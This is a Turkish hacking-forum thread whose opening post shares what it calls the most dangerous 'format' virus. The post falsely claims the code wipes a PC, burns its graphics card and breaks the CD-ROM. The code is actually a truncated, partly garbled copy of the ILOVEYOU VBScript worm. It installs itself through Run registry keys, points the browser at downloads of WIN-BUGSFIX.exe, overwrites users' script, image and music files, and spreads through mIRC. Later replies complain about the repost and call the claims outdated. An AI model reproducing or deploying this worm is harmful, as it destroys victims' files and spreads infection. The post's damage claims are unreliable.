İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

En Tehlikeli Format Kodu[Sakın Kendi Pc'nde Deneme]

27-02-2013 16:42
#1
Üyelik tarihi:
02/2013
Nereden:
Not Found
Mesajlar:
2.069
Teşekkür (Etti):
169
Teşekkür (Aldı):
324
Konular:
359
Ticaret:
(0) %
buda Format virüsü karşıya gönderdiğinizde 30sn içinde pc otomatikmen format atıyor ayrıca format atarken ekran kartını yakıp CD-romu bozuyor yani format attıktan sonra tekrardan windowsu geri yüklüyemeyecektir çünkü CD-rom Cd okumuyacaktı yenisini alsa bile yani anlıcayacğınız pc toprak oldu demektir...

rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0



Bir Teşekkür Yeterli...
Kullanıcı İmzası
Son update

Yeni İsim : Black Lifee


TurkHackTeam.net/org

27-02-2013 16:46
#2
Üyelik tarihi:
02/2013
Mesajlar:
7
Teşekkür (Etti):
36
Teşekkür (Aldı):
1
Konular:
1
Ticaret:
(0) %
Saol Dostum İnşallah işime yarar...
27-02-2013 19:38
#3
seyid93 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
MALATYA
Mesajlar:
117
Teşekkür (Etti):
10
Teşekkür (Aldı):
103
Konular:
47
Ticaret:
(0) %
aynısı paylaşılmıştır lütfen araştırıp paylaşırsanız sizin için daha iyi olur,

Açiklama yetersiz !!

[İYİ FORUMLAR]
Kullanıcı İmzası
Gє̶ς̶м̶i̶ş̶є̶ ̶в̶i̶я̶ ̶Ç̶i̶z̶q̶i̶ ̶Ç̶є̶к̶т̶i̶м̶...! ;]

۩ SAYGI DUYARIM, SAYGI BEKLERİM.

۩ YORUMLARIMA VE MESAJLARIMA TEŞEKKÜR EDERSENİZ SEVİNİRİM..

TÜRK HACK TEAM

THT..
28-02-2013 19:11
#4
sefa3395 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2013
Mesajlar:
77
Teşekkür (Etti):
24
Teşekkür (Aldı):
1
Konular:
16
Ticaret:
(0) %
tesekürler
28-02-2013 20:01
#5
seyid93 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
MALATYA
Mesajlar:
117
Teşekkür (Etti):
10
Teşekkür (Aldı):
103
Konular:
47
Ticaret:
(0) %
sağol kardeşim
Kullanıcı İmzası
Gє̶ς̶м̶i̶ş̶є̶ ̶в̶i̶я̶ ̶Ç̶i̶z̶q̶i̶ ̶Ç̶є̶к̶т̶i̶м̶...! ;]

۩ SAYGI DUYARIM, SAYGI BEKLERİM.

۩ YORUMLARIMA VE MESAJLARIMA TEŞEKKÜR EDERSENİZ SEVİNİRİM..

TÜRK HACK TEAM

THT..
08-03-2013 15:44
#6
yksel - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2008
Nereden:
sistem32
Yaş:
34
Mesajlar:
1.261
Teşekkür (Etti):
59
Teşekkür (Aldı):
228
Konular:
67
Ticaret:
(0) %
çok kez verildi önce araştırın açmadan önce
Kullanıcı İmzası
09-03-2013 08:52
#7
faftir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
789
Teşekkür (Etti):
24
Teşekkür (Aldı):
56
Konular:
37
Ticaret:
(0) %
flood yapmak ban sebebdir krdeşim konunun aynısı varsa tekrardan aynısını açmak ban sebebi
09-03-2013 10:16
#8
M4HIR - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2013
Mesajlar:
62
Teşekkür (Etti):
11
Teşekkür (Aldı):
2
Konular:
2
Ticaret:
(0) %
aynısı paylaşıldı lütfen arama yapın.
09-03-2013 10:20
#9
2nokta - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2013
Yaş:
27
Mesajlar:
16.757
Teşekkür (Etti):
10721
Teşekkür (Aldı):
7716
Konular:
2064
Ticaret:
(0) %
ekran kartınn yanabilmesi için eski ekran kartlarından olması lazım.ekran kartına çok veri gönderip yakıyodu evet ama artık dediğin kodlar eskidi.İçindeki kodlardan dolayı en adi anti virüs programları bile yakalayabiliyo.arkdaşların dediğine göre zaen başka konudan alıntı yapmıssın.Bence bi dene ondan sonra paylaş.
09-03-2013 23:34
#10
masiwe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Mesajlar:
32
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Konular:
12
Ticaret:
(0) %
teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı